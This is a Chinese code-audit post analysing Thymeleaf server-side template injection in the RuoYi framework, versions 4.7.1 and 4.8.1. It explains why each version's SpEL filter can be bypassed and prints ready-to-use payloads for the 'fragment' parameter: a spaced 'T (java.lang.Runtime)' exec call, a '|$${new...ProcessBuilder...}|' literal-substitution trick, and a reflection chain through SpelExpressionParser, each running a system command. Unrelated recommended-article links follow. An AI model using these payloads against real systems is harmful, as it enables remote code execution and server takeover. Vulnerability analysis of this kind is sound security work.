【代码审计】RuoYi-4.7.1&4.8.1 Thymeleaf模板注入分析

目录

[V 4.7.1](#V 4.7.1)

[V 4.8.1](#V 4.8.1)


V 4.7.1

用的是3.0.12的Thymeleaf依赖

该版本对新建类有一些限制

https://github.com/thymeleaf/thymeleaf/issues/809

这三个路由都可以从fragment处打入thymeleaf ssti

打入payload:

复制代码
fragment=${T (java.lang.Runtime).getRuntime().exec("calc")}

来分析下为什么要这么构造payload:

3.0.12的Thymeleaf要求不能containsSpELInstantiationOrStatic

作用是 检测一个 SpEL表达式中是否包含对象实例化(如 new SomeClass(...))或静态方法调用(如 T(SomeClass).method())。

首先是把独立的new给ban了,也不允许出现T(xxx)

可以加个空格,用T (xxx)来进行绕过

V 4.8.1

用的是3.0.15的Thymeleaf依赖

来看下区别

用于检测字符串中是否存在以 $、*、#、@ 或 ~ 开头、后跟空白字符或者{,如果以该格式,则不允许

可以这么绕过

复制代码
|$${new.java.lang.ProcessBuilder('calc').start()}|

等效于

复制代码
'$' + ${new.java.lang.ProcessBuilder('calc').start()}

打入payload:

复制代码
fragment=|$${new.java.lang.ProcessBuilder('calc').start()}|

或者

复制代码
fragment=|$${''.getClass().forName('org.'+'springframework.expression.spel.standard.SpelExpressionParser').newInstance().parseExpression("''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')").getValue()}|
相关推荐
摇滚侠19 小时前
JavaWeb 全套教程 Listener 112-113
java·开发语言·servlet·tomcat·intellij-idea
曹牧19 小时前
Java:Deprecated 是
java·开发语言
用户9168422027419 小时前
Spring Boot application.yml 最全避坑与多环境配置
java·后端
持敬chijing19 小时前
Web渗透之SQL注入-堆叠注入(Stacked Queries Injection)
sql·安全·web安全·网络安全·网络攻击模型·安全威胁分析
kobe_t19 小时前
‌Spring AI
java
骄马之死20 小时前
Spring 核心知识点(IOC + AOP + 事务)
java·后端·spring
学计算机的计算基20 小时前
2026 年 AI 助手三国杀:Claude Code vs 腾讯马维斯 vs MiniMax Mavis,我同时用了三周,结论很意外
java·人工智能·python·算法·langchain
_Aaron___20 小时前
Spring AI 应用上线前,先把大模型调用变成可观测链路
java·人工智能·spring
小糯米60120 小时前
C语言 自定义类型:联合和枚举
java·c语言·开发语言
weixin_5231853220 小时前
Java基础知识总结(二):JVM内存结构与变量生命周期
java·开发语言·jvm